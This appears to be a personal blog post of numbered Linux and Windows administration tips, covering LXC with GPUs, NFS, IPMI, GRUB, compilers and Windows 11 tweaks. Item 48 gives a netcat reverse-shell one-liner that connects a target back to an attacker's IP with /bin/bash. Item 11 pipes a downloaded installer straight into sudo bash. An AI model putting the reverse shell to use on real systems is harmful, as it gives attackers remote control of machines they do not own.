LinuxTips16
Nov 27, 2023
Technology
1. ArchLinux ctg items
Install nomachine:
$ export https_proxy=http://192.168.1.194:10809
$ export http_proxy=http://192.168.1.194:10809
$ yay --sudoflags="http_proxy=http://192.168.1.194:10809 https_proxy=http://192.168.1.194:10809" nomachine
Configure auto-login refers to 2021-06-15-iPadiPhoneMirroringDisplay.md
connecting to :
2. conda deactivate base
via:
conda config --set auto_activate_base false
Doing this could let python to be set to system default.
$ which python3
/usr/bin/python3
3. lxc with nvidia support
Start a lxc instance via:
$ sudo lxc launch images:ubuntu/jammy lxcnvidia
Creating lxcnvidia
Starting lxcnvidia
$ sudo lxc config set lxcnvidia nvidia.driver.capabilities=all
$ sudo lxc config show lxcnvidia | grep nvidia
nvidia.driver.capabilities: all
Configure in lxc instance:
$ sudo lxc exec lxcnvidia bash
root@lxcnvidia:~#
4. lxc with nvidia(correct way)
Steps:
lxc launch ubuntu:18.04 cuda -c nvidia.runtime=true
lxc config device add cuda gpu gpu
lxc exec cuda -- nvidia-smi
5. lxc add second nic(macvlan)
Create a new profile:
$ cat macvlan
config: {}
description: Default LXD profile modified for using macvlan
devices:
eth1:
nictype: macvlan
parent: enp3s0
type: nic
name: macvlan
Create this new profile:
# lxc profile edit macvlan<macvlan
# lxc config edit cuda
profiles:
- default
+++ - macvlan
# lxc restart cuda
# lxc exec cuda bash
dhclient eth1
Then you got the address.
Start the ui:
dash@cuda:~/webui$ ./webui.sh
################################################################
Install script for stable-diffusion + Web UI
Tested on Debian 11 (Bullseye)
################################################################
Should change its listening address to 0.0.0.0
6. lxc on ubuntu22.04
not started, solved via:
GRUB_CMDLINE_LINUX_DEFAULT="quiet splash systemd.unified_cgroup_hierarchy=false"
7. ipmi set address
set bmc port’s ip address to 192.168.2.167, gateway 192.168.2.1 via:
ipmitool lan set 1 ipsrc static
ipmitool lan set 1 ipaddr 192.168.2.167
ipmitool lan set 1 defgw ipaddr 192.168.2.1
ipmitool lan print 1
8. apt-cache policy alternative
in yum, via:
yum --showduplicates list
9. cut video using ffmpeg
cut unnecessary part and combine then again:
$ ffmpeg -ss 00:00:06 -t 00:03:43 -i SLXC-2023-12-08_11.25.03.mp4 -vcodec copy -acodec copy split1.mp4
$ ffmpeg -ss 00:05:55 -t 00:09:00 -i SLXC-2023-12-08_11.25.03.mp4 -vcodec copy -acodec copy split2.mp4
$ ffmpeg -ss 00:15:46 -t 00:00:35 -i SLXC-2023-12-08_11.25.03.mp4 -vcodec copy -acodec copy split3.mp4
$ vim list.txt
file ./split1.mp4
file ./split2.mp4
file ./split3.mp4
$ ffmpeg -f concat -safe 0 -i list.txt -c:v copy vdiidvRONG.mp4
10. NFS server(ubuntu22.04)
Steps:
sudo apt update
sudo apt install nfs-kernel-server
sudo mkdir -p /mnt/nfs_share
sudo chown -R nobody:nogroup /mnt/nfs_share/
sudo chmod 777 /mnt/nfs_share/
sudo nano /etc/exports
/mnt/nfs_share 192.168.1.1/24(rw,sync,no_subtree_check)
sudo exportfs -a
sudo systemctl restart nfs-kernel-server
sudo systemctl enable nfs-kernel-server
mount via:
sudo mount -t nfs 192.168.1.194:/mnt/nfs_share /mnt
11. install casaos
via:
curl -fsSL https://get.casaos.io | sudo bash
12. rst2html issue
Solved via:
apt-get install python3-docutils
13. redroid and webui
via:
docker run -itd --privileged -v /root/scrcpy-web/data:/data --name scrcpy-web -p 48000:8000/tcp --link redroid12:myphone1 emptysuns/scrcpy-web:v0.1
docker run -itd --name redroid12 --privileged -p 5555:5555 redroid12:latest androidboot.use_memfd=1
Should re-write using docker-compose.
14. ubuntu2204 docker issue
solved via:
vagrant@vagrant:~$ sudo update-alternatives --config iptables
There are 2 choices for the alternative iptables (providing /usr/sbin/iptables).
Selection Path Priority Status
------------------------------------------------------------
* 0 /usr/sbin/iptables-nft 20 auto mode
1 /usr/sbin/iptables-legacy 10 manual mode
2 /usr/sbin/iptables-nft 20 manual mode
Press <enter> to keep the current choice[*], or type selection number: 1
update-alternatives: using /usr/sbin/iptables-legacy to provide /usr/sbin/iptables (iptables) in manual mode
vagrant@vagrant:~$ sudo update-alternatives --config ip6tables
There are 2 choices for the alternative ip6tables (providing /usr/sbin/ip6tables).
Selection Path Priority Status
------------------------------------------------------------
* 0 /usr/sbin/ip6tables-nft 20 auto mode
1 /usr/sbin/ip6tables-legacy 10 manual mode
2 /usr/sbin/ip6tables-nft 20 manual mode
Then restart docker systemd service.
15. build kernel time
in i7-1165g7, build 6.1.x kernel time:
$ time sh -c 'make -j8 && make modules -j8 && sudo make install && sudo make modules_install '
......
real 28m34.866s
user 138m28.034s
sys 10m21.570s
16. apt force overwrite
via:
sudo apt-get -o Dpkg::Options::="--force-overwrite
17. vbox issue
via:
sudo groupadd vboxusers
Then add the current user to the above group:
$ sudo usermod -a -G vboxusers sk
Replace sk with your current username.
Check if the user is added to the group:
$ grep vboxusers /etc/group
vboxusers:x:1001:sk
Yes, the user sk has been added to vboxusers' group.
Finally, restart the virtualbox kernel module using command:
$ sudo /sbin/vboxconfig
18. libvirtd nvram privilege issue
/var/lib/libvirt/qemu/nvram/win11_VARS.fd': Permission denied, solved via:
1. Add the following lines to the end of /etc/apparmor.d/abstractions/libvirt-qemu
/var/lib/libvirt/qemu/nvram/* rwk,
/sys/kernel/mm/transparent_hugepage/enabled r,
/usr/share/OVMF/OVMF_CODE_4M.secboot.fd rk,
/run/libvirt/qemu/swtpm/* rwk,
2. Reload apparmor, restart libvirtd:
sudo systemctl reload apparmor.service
sudo systemctl restart libvirtd
19. nvflash download
nvflash is used for dumping out the nvidia video flash, download it from https://www.techpowerup.com/download/nvidia-nvflash/
20. totally blacklist i915
via:
$ sudo vim /etc/modprobe.d/blacklist.conf
blacklist.conf
blacklist snd_hda_intel
blacklist snd_hda_codec_hdmi
blacklist i915
$ sudo update-initramfs -u -k all
21. activate the pvs and mount
solved via:
vgchange -ay
mkdir -p /mnt8
mount /dev/mapper/pve-root /mnt8
22. build celanda docker
sudo docker run -it ubuntu:18.04 /bin/bash, then in docker instance for doing following steps:
apt update -y
apt install -y build-essential git git-lfs
apt install -y python-six
apt install -y wget curl
ln -sf /usr/bin/python3 /usr/bin/python
apt install -y iotop htop nethogs python-pystache python3-pystache
scp dash@192.168.1.45:~/.bin/repo .
cp repo /bin/
cp repo /usr/bin/repo
Commit the docker instance:
$ sudo docker commit a3e139322b90 buildceladon:latest
23. ipmi reset in system
ipmi cold reset in system .
# ipmitool bmc reset cold
Sent cold reset command to MC
24. nvidia conflict driver
error messages:
dpkg: error processing archive /var/cache/apt/archives/nvidia-kernel-common-535_535.161.07-0ubuntu1_amd64.deb (--unpack):
trying to overwrite '/lib/firmware/nvidia/535.161.07/gsp_ga10x.bin', which is also in package nvidia-firmware-535-535.161.07 535.161.07-0ubuntu0.22.04.1
dpkg-deb: error: paste subprocess was killed by signal (Broken pipe)
Errors were encountered while processing:
/var/cache/apt/archives/nvidia-kernel-common-535_535.161.07-0ubuntu1_amd64.deb
solved via:
sudo dpkg -i --force-all /var/cache/apt/archives/nvidia-kernel-common-535_535.161.07-0ubuntu1_amd64.deb
sudo apt --fix-broken install
25. cpupower
Install:
sudo apt install -y linux-tools-common
sudo apt install -y linux-tools-generic
sudo apt install -y linux-tools-6.5.0-25-generic
with linux-tools-common you will also have the turbostat for viewing the power consumption.
26. s-tui
Install via apt install -y s-tui.
27. cpupower
Set default grub items:
GRUB_CMDLINE_LINUX_DEFAULT="quiet splash amd_pstate=guided"
then check the governer:
$ cpupower frequency-info
...
available cpufreq governors: conservative ondemand userspace powersave performance schedutil
...
set to ondemand:
sudo cpupower frequency-set -g ondemand
28. show htop on ssh
via:
ssh user@test.home -t 'htop'
29. quickly pip
via:
pip install xxxx -i https://pypi.mirrors.ustc.edu.cn/simple/
30 . git lfs
If git won’t call git-lfs for downloading big files, install:
git lfs install
resulting in:
$ cat ~/.gitconfig
[filter "lfs"]
smudge = git-lfs smudge -- %f
process = git-lfs filter-process
required = true
clean = git-lfs clean -- %f
31. update multiple gcc selection
Steps:
sudo update-alternatives --remove-all gcc
sudo update-alternatives --remove-all g++
sudo apt install gcc-11 gcc-12 g++-11 g++-12
sudo update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-11 10
sudo update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-12 20
sudo update-alternatives --install /usr/bin/g++ g++ /usr/bin/g++-11 10
sudo update-alternatives --install /usr/bin/g++ g++ /usr/bin/g++-12 20
sudo update-alternatives --install /usr/bin/cc cc /usr/bin/gcc 30
sudo update-alternatives --set cc /usr/bin/gcc
sudo update-alternatives --install /usr/bin/c++ c++ /usr/bin/g++ 30
sudo update-alternatives --set c++ /usr/bin/g++
Select default items:
sudo update-alternatives --config gcc
sudo update-alternatives --config g++
32. speedup disk
via disable fstrim on ubuntu:
sudo systemctl disable fstrim.timer
33. github actions update
purplepalmdash/purplepalmdash.github.io's Deploy keys, add the new deploy keys:
purplepalmdash/blogsource's Settings-> Secrets and variables -> Actions, add a new ACTIONS_DEPLOY_KEY:
The first picture contains content from id_ed25519.pub, while the second is id_ed25519, which are generated via ssh-keygen -t ed25519 -C "xxxxxx@gmail.com".
Change the file:
$ cat .github/workflows/main.yml
......
- name: Deploy
uses: peaceiris/actions-gh-pages@v3
with:
deploy_key: ${{ secrets.ACTIONS_DEPLOY_KEY }}
external_repository: purplepalmdash/purplepalmdash.github.io
publish_dir: ./src/public
publish_branch: master
34. wake-on-lan configuration
Enable wake on lan for linux configuration, and make it permanently:
test@2204:~$ sudo vim /etc/systemd/system/wol.service
test@2204:~$ sudo systemctl daemon-reload
test@2204:~$ sudo systemctl enable wol.service
Created symlink /etc/systemd/system/basic.target.wants/wol.service → /etc/systemd/system/wol.service.
test@2204:~$ cat /etc/systemd/system/wol.service
[Unit]
Description=Enable Wake On Lan
[Service]
Type=oneshot
ExecStart = /sbin/ethtool --change enp1s0 wol g
[Install]
WantedBy=basic.target
test@2204:~$ /sbin/ethtool --change enp1s0 wol g
netlink error: Operation not permitted
test@2204:~$ sudo /sbin/ethtool --change enp1s0 wol g
test@2204:~$ sudo ethtool enp1s0 | grep Wake
Supports Wake-on: pumbg
Wake-on: g
test@2204:~$ sudo shutdown -h now
Connection to 192.168.1.40 closed by remote host.
35. update-grub2 not working for efi
solved via:
grub-install --efi-directory=/boot/efi
36. ipxe bootup issue
let realtek use its own efi file for bootup, solved via:
# vim /etc/dhcp/dhcpd.conf
host st12400 {
hardware ethernet 54:f6:c5:1f:23:bd;
filename "realtek.efi";
}
# systemctl restart isc-dhcp-server
37. win11 passwordless login
Login without insert password:
38. change win11 behavior
via:
C:\Users\feipyang>reg add "HKCU\Software\Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}\InprocServer32" /f /ve
操作成功完成。
C:\Users\feipyang>taskkill /f /im explorer.exe & start explorer.exe
成功: 已终止进程 "explorer.exe",其 PID 为 10536。
39. 7z extract files
via:
7za x xxxx.7z
40. ast resolution
ast resolution:
xrandr --newmode "1440x900_59.90" 106.29 1440 1520 1672 1904 900 901 904 932 -HSync +Vsync
xrandr --addmode VGA-1 1440x900_59.90
41. win11 passwordless login
Solved via:
按win+R,打开运行,输入Control Userpasswords2,打开用户账户。
用户账户设置.png
打开该设置,取消选中该选项,点击应用,输入想要自动登录的账户和密码,即可开机后自动登录Windows。
若此界面无该选项,按win+R,打开运行,输入regedit,打开注册表修改
路径:计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\PasswordLess\Device
这个路径下的DevicePasswordLessBuildVersion数值从2改成0,再次打开用户账户设置就有选项了。
42. Windows 11 ignore network installation
via:
OOBE\BYPASSNRO
43. mii-tool for re-negotiate
steps:
root@aiBox:/home/dash# mii-tool enp2s0
enp2s0: negotiated 100baseTx-FD, link ok
root@aiBox:/home/dash# mii-tool -r enp2s0
restarting autonegotiation...
root@aiBox:/home/dash# mii-tool enp2s0
enp2s0: negotiated 1000baseT-FD flow-control, link ok
44 . quickly install linuxloop
Change the content of linuxloop:
chroot_Arch()
{
prepare_bootstrap="
curl -l https://archlinux.org/mirrorlist/?ip_version=4 -o /etc/pacman.d/mirrorlist
sed -i 's@#Server = https://mirrors.ustc.edu.cn@Server = https://mirrors.ustc.edu.cn@g' /etc/pacman.d/mirrorlist
pacman -Syu --noconfirm --needed bash bash-completion btrfs-progs bzip2 ca-certificates coreutils cryptsetup curl dosfstools e2fsprogs efibootmgr gzip lsof nano openssl reflector sudo strace tar util-linux xz zstd
"
cat >"${linuxloopsdir}"/chroot/bootstrap/linuxloops/prepare_chroot <<PREPARE_CHROOT
#!/bin/bash
set -e
#reflector --latest 10 --threads 10 --connection-timeout 1 --download-timeout 1 --protocol https --completion-percent 90 --sort rate --save /etc/pacman.d/mirrorlist --verbose
echo 'Server = http://mirrors.ustc.edu.cn/archlinux/\$repo/os/\$arch'>/etc/pacman.d/mirrorlist
cat /etc/pacman.d/mirrorlist
pacstrap -G /mnt base base-devel
PREPARE_CHROOT
chmod 0755 "${linuxloopsdir}"/chroot/bootstrap/linuxloops/prepare_chroot
Host’s /etc/resolv.conf should be set to nameserver 223.5.5.5.
Install via:
test@vhdboot:~$ sudo bash ~/linuxloops -distro Arch -env None -dst /home/test/arch.img -s 30
menuentry 'Arch' --class 'arch' {
rmmod tpm
img_path="/home/test/arch.img"
img_uuid="6ab60fa1-d874-4b84-99d9-8ac0230f0303"
search --no-floppy --set=root --file "${img_path}"
loopback loop "${img_path}"
linuxloops_args="rdinit=/linuxloops img_path=${img_path} img_uuid=${img_uuid}"
export linuxloops_args
if [ -f (loop,2)/grub2/grub.cfg ]; then
configfile (loop,2)/grub2/grub.cfg
else
configfile (loop,2)/grub/grub.cfg
fi
}
45. enable detect os
enable os-probe:
$ sudo vim /etc/default/grub
GRUB_DISABLE_OS_PROBER=false
$ sudo update-grub2
46. disable netbootxyz
via:
dash@ai:~/Code/netboot.xyz$ cd ~/containerdata-public/docker/netbootxyz/
dash@ai:~/containerdata-public/docker/netbootxyz$ ls
assets config docker-compose.yml docker-compose.yml~ readme.md
dash@ai:~/containerdata-public/docker/netbootxyz$ sudo docker-compose down
Stopping netbootxyz ... done
Removing netbootxyz ... done
Removing network netbootxyz_default
47. tio(replace minicom)
via:
sudo pacman -S tio
sudo tio /dev/ttyUSB0
sudo tio --baudrate 115200 --databits 8 --flow none --stopbits 1 --parity none /dev/ttyUSB0
48. nc tips
via:
攻击机开启本地监听:
netcat -lvvp 2333
目标机主动连接攻击机:
netcat 47.xxx.xxx.72 2333 -e /bin/bash
# nc <攻击机IP> <攻击机监听的端口> -e /bin/bash
49 rtl 8111/8168 driver
Install driver for enable WOL:
